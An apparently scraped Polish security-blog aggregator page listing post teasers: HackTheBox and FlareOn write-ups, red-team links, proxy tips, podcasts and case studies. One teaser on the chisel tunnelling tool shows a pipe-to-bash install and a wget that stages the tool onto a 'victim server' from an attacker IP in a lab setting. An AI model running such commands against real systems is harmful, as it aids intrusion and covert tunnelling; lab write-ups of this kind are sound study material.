Serwisy SEC

New Cheatsheet XSS 2021

New Cheatsheet XSS 2021

5 lat temu https://netsec.expert/posts/xss-in-2021/
Wyjątki. Czego unikać?

Wyjątki. Czego unikać?

5 lat temu Java pozwala nam na używanie wyjątków do czego sobie zapragniemy. Jako developerzy wiemy natomiast, iż wyjątki służą do sytuacji wyjątkowych i mamy do nich jakiś szacunek. Jednak, kiedy przychodzi do zaprojektowania pewnej części systemu zdarza nam s...
Wyjątki. Czego unikać?

Wyjątki. Czego unikać?

5 lat temu Java pozwala nam na używanie wyjątków do czego sobie zapragniemy. Jako developerzy wiemy natomiast, iż wyjątki służą do sytuacji wyjątkowych i mamy do nich jakiś szacunek. Jednak, kiedy przychodzi do zaprojektowania pewnej części systemu zdarza nam s...
"Nie będziemy negocjować" - casus CD Projekt RED

"Nie będziemy negocjować" - casus CD Projekt RED

sasmaczyliblogbezpiecznika.blogspot.com 5 lat temu Najpierw parę faktów 09.02.2021 roku CD Projekt RED poinformował, iż został zhakowany, część urządzeń zaszyfrowana, skradzione zostały kody źródłowe kluczowych gier oraz duża ilość dokumentów.Przestępcy zażądali okupu grożąc ujawnieniem skradzionych...
Writeup: Maszyna HackTheBox Worker

Writeup: Maszyna HackTheBox Worker

5 lat temu 1. TLDR 2. Przygotowanie Przygotowałem przydatne zmienne: export IP=10.10.10.203 3. Skanowanie i rozpoznanie Na początku użyłem narzędzia nmap do identyfikacji otwartych portów: ┌─[t4wny0wl@whitehatlab]─[~/ctf/hackthebox/Machines/Windows/Worker] └──╼...
Writeup: Maszyna HackTheBox Omni

Writeup: Maszyna HackTheBox Omni

5 lat temu 1. TLDR 2. Przygotowanie Przygotowałem przydatne zmienne: export IP=10.10.10.204 3. Skanowanie i rozpoznanie Na początek użyłem narzędzia nmap do identyfikacji otwartych portów: ┌─[t4wny0wl@whitehatlab]─[~/ctf/hackthebox/Machines/Other/Omni] └──╼ $nm...
TCP/UDP reverse tunnel, transported over HTTP, secured via SSH - chisel

TCP/UDP reverse tunnel, transported over HTTP, sec...

5 lat temu #### CHISEL INSTALL curl https://i.jpillora.com/chisel! | bash ## copy to victim server: www-data@passage:/tmp$ wget http://10.10.14.143/chisel wget http://10.10.14.143/chisel --2021-01-25 08:55:34-- http://10.10.14.143/chisel Connecting to 10.10.1...
Red Team Notes 2.0

Red Team Notes 2.0

5 lat temu https://dmcxblue.gitbook.io/red-team-notes-2-0/
Pihole – Cert Hole itp

Pihole – Cert Hole itp

5 lat temu DNS Hole od kilkunastu lat jest wykorzystywane do wielu celów. Zwykle do blokowania reklam na portalach, usług śledzących itp. Jednakże dożyliśmy takich czasów, iż DNS Hole coraz częściej wykorzystywane jest do zapewnienia bezpieczeństwa użytkownikó...
Redis. Wprowadzenie Dla Początkujących

Redis. Wprowadzenie Dla Początkujących

5 lat temu Redis jest popularnym projektem open sourcowym, który od roku 2013 zyskuje coraz to większą i większą rozpoznawalność w światku IT. Dziś, w roku 2021, Redis jest znany jako NoSQL-owa baza danych klucz-wartość działająca w pamięci, a jej najpopularnie...
Redis. Wprowadzenie Dla Początkujących

Redis. Wprowadzenie Dla Początkujących

5 lat temu Redis jest popularnym projektem open sourcowym, który od roku 2013 zyskuje coraz to większą i większą rozpoznawalność w światku IT. Dziś, w roku 2021, Redis jest znany jako NoSQL-owa baza danych klucz-wartość działająca w pamięci, a jej najpopularnie...
Serwery dla integratora systemu ERP enova365 – case study COM@COM

Serwery dla integratora systemu ERP enova365 – cas...

5 lat temu Systemy ERP są krwioobiegiem nowoczesnej firmy, żeby działały w sposób optymalny muszą dysponować odpowiednią infrastrukturą - sprawdź jakie środowisko przygotowaliśmy dla integratora COM@COM.
Pihole – regexp

Pihole – regexp

5 lat temu Jeśli ktoś korzysta z PiHole to podaję swoje regexp. Opracowane na podstawie własnych analiz ruchu itp. Domeny wyłapane w ruchu ISP Debacom Zabrze: [0-9a-za-z]{13-18}\.tickets [0-9a-za-z]{13-18}\.blackfriday v1\.[a-uw-z]{7}\.ru v[12]{1}\.[a-uw-z]{7}\...
Random:view #003 – Crosscast Cyber, Cyber… 113: Rozmowa z kocem o mRNA

Random:view #003 – Crosscast Cyber, Cyber… 113: Ro...

5 lat temu Rozmowa Mirosława Maja i Łukasza Jachowicza z Pawłem Wilkiem na temat reverse engineeringu szczepionki przeciwko SARS-CoV-2 w ramach podcastu Cyber, Cyber… Fundacji Bezpieczna Cyberprzestrzeń.
MAC address c8:93:46 – ZeverSolar

MAC address c8:93:46 – ZeverSolar

5 lat temu Robiłem porządki w swojej sieci domowej. Napotkałem na problem, adres mac: c8:93:46:36:10:1c Gadatliwe to nie było, porty pozamykane. MAC address określał producenta: "MXCHIP Company Limited" Wiele to nie dało, poza tym iż trop kierował na IoT. Poni...
Kalendarium - przegląd wydarzeń z 2020 roku

Kalendarium - przegląd wydarzeń z 2020 roku

5 lat temu 2020 rok już za nami, dlatego zdecydowaliśmy się przypomnieć naszym czytelnikom niektóre ważne wydarzenia dotyczące służb specjalnych oraz branży IT, tworząc mini kalendarium 2020 roku:
Ataki AIR-FI. RAM jako nadajnik radiowy

Ataki AIR-FI. RAM jako nadajnik radiowy

5 lat temu Szyny danych w pamięciach RAM współczesnych komputerów osiągnęły takie częstotliwości pracy, iż możliwe jest używanie ich w roli nadajników radiowych, a co za tym idzie wykorzystywanie do wykradania danych, choćby wtedy, gdy komputer jest odłączony o...
PfSense – repo oficjalne BSD

PfSense – repo oficjalne BSD

5 lat temu /etc/pkg/FreeBSD.conf –> ustaw enabled na yes /usr/local/etc/pkg/repos/FreeBSD.conf –> ustaw enabled na yes /usr/local/etc/pkg/repos/pfSense.conf –> ustaw enabled na yes.
Reverse engineering kodu źródłowego szczepionki. BioNTech / Pfizer SARS-CoV-2

Reverse engineering kodu źródłowego szczepionki. B...

5 lat temu Witaj! W tym poście będziemy przyglądali się znak po znaku kodowi źródłowemu szczepionki BioNTech / Pfizer SARS-CoV-2 mRNA.
POIT 099: Podsumowanie 2020

POIT 099: Podsumowanie 2020

5 lat temu Witam w dziewięćdziesiątym dziewiątym odcinku podcastu "Porozmawiajmy o IT". Tematem dzisiejszej rozmowy jest podsumowanie roku 2020.Dziś moim gościem jest Grzegorz Kotfis – programista z wieloletnim doświadczeniem najsilniej związany z technologią ....
Writeup: Maszyna HackTheBox SneakyMailer

Writeup: Maszyna HackTheBox SneakyMailer

5 lat temu 1. TLDR 2. Przygotowanie Przygotowałem przydatne zmienne: export IP=10.10.10.197 3. Skanowanie i rozpoznanie Na początku uruchomiłem skanowanie narzędziem nmap w celu ujawnienia i identyfikacji usług, które zostały uruchomione na 1000 najbardziej pop...
Intercept http2 (grpc) in BURP SUITE PROXY

Intercept http2 (grpc) in BURP SUITE PROXY

5 lat temu as root: iptables -t nat -A OUTPUT -p tcp -m owner ! --uid-owner mitmproxyuser -d 18.159.107.117 -j REDIRECT --to-port 8080 adduser mitmproxyuser cat /etc/nghttpx/nghttpx.conf (downstream config) frontend=0.0.0.0,8080;no-tls backend=127....
Forward local connections to local BURP PROXY / MITM PROXY

Forward local connections to local BURP PROXY / MI...

5 lat temu 0) sysctl -w net.ipv4.ip_forward=1 sysctl -w net.ipv6.conf.all.forwarding=1sysctl -w net.ipv4.conf.all.send_redirects=0 1) iptables -t nat -A OUTPUT -p tcp -m owner ! --uid-owner mitmproxyuser -d dst_ip -j REDIRECT --to-port 8080 2) useradd --cr...
Virtualbox + 4k (3840x2160) resolution on guest

Virtualbox + 4k (3840x2160) resolution on guest

5 lat temu PS C:\Program Files\Oracle\VirtualBox> .\VBoxManage.exe setextradata global GUI/MaxGuestResolution "3840,2160" PS C:\Program Files\Oracle\VirtualBox> .\VBoxManage.exe getextradata global GUI/MaxGuestResolution Value: 3840,2160 PS C:\Program Fil...
Środowisko IT do monitorowania Ziemi – case study Europejska Agencja Kosmiczna

Środowisko IT do monitorowania Ziemi – case study ...

5 lat temu "Fly me to the moon..." - zrobiliśmy to, pozyskaliśmy pierwsze zlecenie w kosmosie. Zobacz jak współpracujemy z Europejską Agencją Kosmiczną.
Lista popularnych wyszukiwarek i narzędzi do rekonesansu by Zwirek

Lista popularnych wyszukiwarek i narzędzi do rekon...

5 lat temu Elegancka lista 😉 https://zwirek.eu/2020/11/25/wyszukiwarki/ .
Szczepionka na COVID-19 - wyzwaniem dla bezpieczeństwa

Szczepionka na COVID-19 - wyzwaniem dla bezpieczeń...

sasmaczyliblogbezpiecznika.blogspot.com 5 lat temu Szczepionka na COVID-19 niewątpliwie stała się tematem numer jeden na koniec tego roku, a z całą pewnością w 2021 roku będziemy słyszeć o niej jeszcze dużo.Z reguły dyskutuje się o jej skuteczności czy też bezpieczeństwie użycia dla pacjenta (i...
Writeup: Maszyna HackTheBox Buff

Writeup: Maszyna HackTheBox Buff

5 lat temu 1. TLDR 2. Przygotowanie Przygotowałem przydatne zmienne: export IP=10.10.10.198 3. Skanowanie i rozpoznanie Na początku użyłem narzędzia nmap do identyfikacji otwartych portów: ┌─[t4wny0wl@whitehatlab]─[~/ctf/hackthebox/Machines/Windows/Buff] └──╼ $...
Windows 10. Wolny Transfer w otoczeniu sieciowym. SMB

Windows 10. Wolny Transfer w otoczeniu sieciowym. ...

5 lat temu Skuteczne rozwiązanie: PowerShell Set-SmbClientConfiguration -EnableBandwidthThrottling 0 -EnableLargeMtu 1 Set-SmbServerConfiguration -EnableLeasing $false NET STOP SERVER NET START SERVER.
Writeup: FlareOn 2020: 008 - Aardvark

Writeup: FlareOn 2020: 008 - Aardvark

5 lat temu 1. TLDR 2. Dane wejściowe Plik z zadaniem znajduje się tutaj. Hasło: flare. Przedmiot zadania stanowi plik ttt2.exe. 3. Inspekcja pliku ttt2.exe Zweryfikowałem plik narzędziem file: $ file ttt2.exe ttt2.exe: PE32+ executable (GUI) x86-64, for MS Wind...
POIT 095: Bezpieczeństwo aplikacji

POIT 095: Bezpieczeństwo aplikacji

5 lat temu Witam w dziewięćdziesiątym piątym odcinku podcastu "Porozmawiajmy o IT". Tematem dzisiejszej rozmowy jest bezpieczeństwo aplikacji.Dziś moim gościem jest Andrzej Dyjak – architekt bezpieczeństwa z kilkunastoletnim doświadczeniem, aktywny konsultant, ...
EEG spienione goni fale. Eksperyment medytacyjny z opaską Muse 2

EEG spienione goni fale. Eksperyment medytacyjny z...

5 lat temu Z roku na rok pojawia się coraz więcej urządzeń pozwalających w domowych warunkach dokonywać pomiarów bioelektrycznej czynności mózgu. Wykorzystuje się w nich zjawisko powstawania fal mózgowych o różnych częstotliwościach, zależnych od aktualnej kond...
AMD EPYC w serwerze do obsługi hostów głosowych – case study Vee SA

AMD EPYC w serwerze do obsługi hostów głosowych – ...

5 lat temu Czy zastosowanie nowoczesnego procesora AMD Epyc może obniżyć koszty eksploatacji środowiska IT? Przeczytaj o naszej nowej realizacji dla Vee SA.
POIT 093: Deep Security

POIT 093: Deep Security

5 lat temu Witam w dziewięćdziesiątym trzecim odcinku podcastu "Porozmawiajmy o IT". Tematem dzisiejszej rozmowy jest Deep Security.Partnerem cyklu jest Atman, dostawca usług IT dla biznesu w modelu outsourcingu.Dziś moim gościem jest Radosław Przybysz – od bli...
Writeup: FlareOn 2020: 006 - codeit

Writeup: FlareOn 2020: 006 - codeit

5 lat temu 1. TLDR 2. Dane wejściowe Plik z zadaniem znajduje się tutaj. Hasło: flare. Przedmiot zadania stanowi plik codeit.exe stanowiący skompilowany skrypt. Z treści zadania wiadomo również, iż flaga została ukryta jako kod QR. 3. Inspekcja pliku codeit.exe...
Writeup: FlareOn 2020: 005 - TKApp

Writeup: FlareOn 2020: 005 - TKApp

5 lat temu 1. TLDR 2. Dane wejściowe Plik z zadaniem znajduje się tutaj. Hasło: flare. Przedmiot zadania stanowi plik TKApp.tpk. Z treści zadania wiadomo, iż jest to plik zawierający oprogramowanie na smartwatch. 3. Inspekcja pliku TKApp.tpk Zweryfikowałem plik...
Writeup: FlareOn 2020: 004 - report

Writeup: FlareOn 2020: 004 - report

5 lat temu 1. TLDR 2. Dane wejściowe Plik z zadaniem znajduje się tutaj. Hasło: flare. Przedmiot zadania stanowi arkusz kalkulacyjny report.xls. Z treści zadania wiadomo, iż znajduje się w nim makro, w którym ukryto flagę. 3. Inspekcja pliku report.xls Zweryfik...
Writeup: FlareOn 2020: 003 - wednesday

Writeup: FlareOn 2020: 003 - wednesday

5 lat temu 1. TLDR 2. Dane wejściowe Plik z zadaniem znajduje się tutaj. Hasło: flare. Przedmiot zadania stanowi gra platformowa mydude.exe: Zgodnie z treścią zadania, podejrzałem plik README.txt: ██╗ ██╗███████╗██████╗ ███╗ ██╗███████╗███████╗██████╗ █████╗ █...
Writeup: FlareOn 2020: 002 - garbage

Writeup: FlareOn 2020: 002 - garbage

5 lat temu 1. TLDR 2. Dane wejściowe Plik z zadaniem znajduje się tutaj. Hasło: flare. Jedyną rzeczą jaką otrzymałem na początku tego zadania był plik garbage.exe 3. Inspekcja pliku garbage.exe Zweryfikowałem plik narzędziem file: $ file garbage.exe garbage.exe...
Writeup: FlareOn 2020: 001 - Fidler

Writeup: FlareOn 2020: 001 - Fidler

5 lat temu 1. TLDR 2. Dane wejściowe Plik z zadaniem znajduje się tutaj. Hasło: flare. Przedmiotem zadania jest program napisany w pythonie. Dostępne pliki to: controls.py fidler.py fonts/arial.ttf fonts/courbd.ttf img/btndown.png img/btnup.png img/clock.png im...
Writeup: Maszyna HackTheBox Blunder

Writeup: Maszyna HackTheBox Blunder

5 lat temu 1. TLDR 2. Przygotowanie Przygotowałem przydatne zmienne: export IP=10.10.10.191 3. Skanowanie i rozpoznanie Na początku uruchomiłem agresywne skanowanie narzędziem nmap w celu ujawnienia i identyfikacji usług, które zostały uruchomione na 1000 najba...
SECURE 2020 - "Ewolucja czy rewolucja Cybertransformacja oczami biznesu"

SECURE 2020 - "Ewolucja czy rewolucja Cybertransfo...

5 lat temu Podczas SECURE 2020 prezentacja Moniki Bogdał z Kancelarii Prawnej Piszcz i Wspólnicy oraz Izabelli Łapko z NASK SA zatytułowana: "Ewolucja czy rewolucja - Cybertransformacja oczami biznesu".
SECURE 2020 - Architektura Zero Trust w oparciu o rozwiązania Fortinet

SECURE 2020 - Architektura Zero Trust w oparciu o ...

5 lat temu Podczas SECURE 2020 prezentacja Jakuba Jagielaka z Atende S.A. zatytułowana "Architektura Zero Trust w oparciu o rozwiązania Fortinet".
SECURE 2020 - "Promocja na powietrze i kradzież danych w gratisie analiza fałszywych sklepów"

SECURE 2020 - "Promocja na powietrze i kradzież da...

5 lat temu Podczas konferencji SECURE 2020 Karolina Wrońska oraz Piotr Derlecki z CyberRescue z prezentacją zatytułowaną: "Promocja na powietrze i kradzież danych w gratisie - analiza fałszywych sklepów internetowych".
Algorytm kmeans bez bibliotek. Zobacz jakie to proste!

Algorytm kmeans bez bibliotek. Zobacz jakie to pro...

5 lat temu Algorytm k-means jest jednym z podstawowych algorytmów uczenia nienadzorowanego. Należy do algorytmów analizy skupień (inaczej grupowania, klasteryzacji) i pozwala na podzielenie elementów na określoną ilość klas ze względu na podobieństwo. Jest on n...
GDrive – Bez limitu

GDrive – Bez limitu

5 lat temu http://td.fastio.me/ Pomijając kwestie bezpieczeństwa danych, fajna sprawa do dzielenia się dużymi plikami. .
Administracja IT i helpdesk dla agencji Plej – case study

Administracja IT i helpdesk dla agencji Plej – cas...

5 lat temu Oszczędność czasu i pieniędzy, sprawdź jak realizujemy usługę outsourcingu IT dla Agencji Plej.
IdentityServer i odświeżanie wartości claims

IdentityServer i odświeżanie wartości claims

blog.gutek.pl 5 lat temu Jak dzięki kodu odświeżyć wartości claims przypisane do UserProfile w IdentityServer.
How to parse ffuf output file

How to parse ffuf output file

5 lat temu ffuf -o output_file cat output_file | jq -c '.results[] | {url:.url,status: .status}' for file in dirb/*; do cat $file | jq -c '.results[] | {url:.url,status: .status}'; done
[ENG] Exploiting a CPU Backdoor for x86 Architecture.

[ENG] Exploiting a CPU Backdoor for x86 Architectu...

5 lat temu Below you may find my presentation from the Confidence 2020. Confidence 2020 Conference Site Feel free to contact me if you have any questions or doubts

Popularne

36-latek pędził volkswagenem na złamanie karku. Po zatrzymaniu przez policję okazało się, że to recydywista

36-latek pędził volkswagenem na złamanie karku. Po zatrzyman...

5 dni temu 214
Zuchwała kradzież na cmentarzu Dębica. Recydywista w rękach policji dzięki bohaterskiej postawie świadków

Zuchwała kradzież na cmentarzu Dębica. Recydywista w rękach ...

6 dni temu 206
Sprawdzili ponad 1000 kierowców, zatrzymali 77 dowodów rejestracyjnych. Służby kontrolowały taksówkarzy

Sprawdzili ponad 1000 kierowców, zatrzymali 77 dowodów rejes...

1 tydzień temu 172
Zapadł wyrok za nieudzielenie pomocy małoletniej ofierze przestępstw seksualnych i współudział w znęcaniu się nad zwierzętami

Zapadł wyrok za nieudzielenie pomocy małoletniej ofierze prz...

1 tydzień temu 165
Pożar zakładów zbrojeniowych w Czechach. Zatrzymano trzy osoby

Pożar zakładów zbrojeniowych w Czechach. Zatrzymano trzy oso...

6 dni temu 149
English (US) English (US) · Polish (PL) Polish (PL) · Russian (RU) Russian (RU) ·
Kontakt · Regulamin · O nas ·

© PORZĄDEK 2026. Wszelkie prawa zastrzeżone.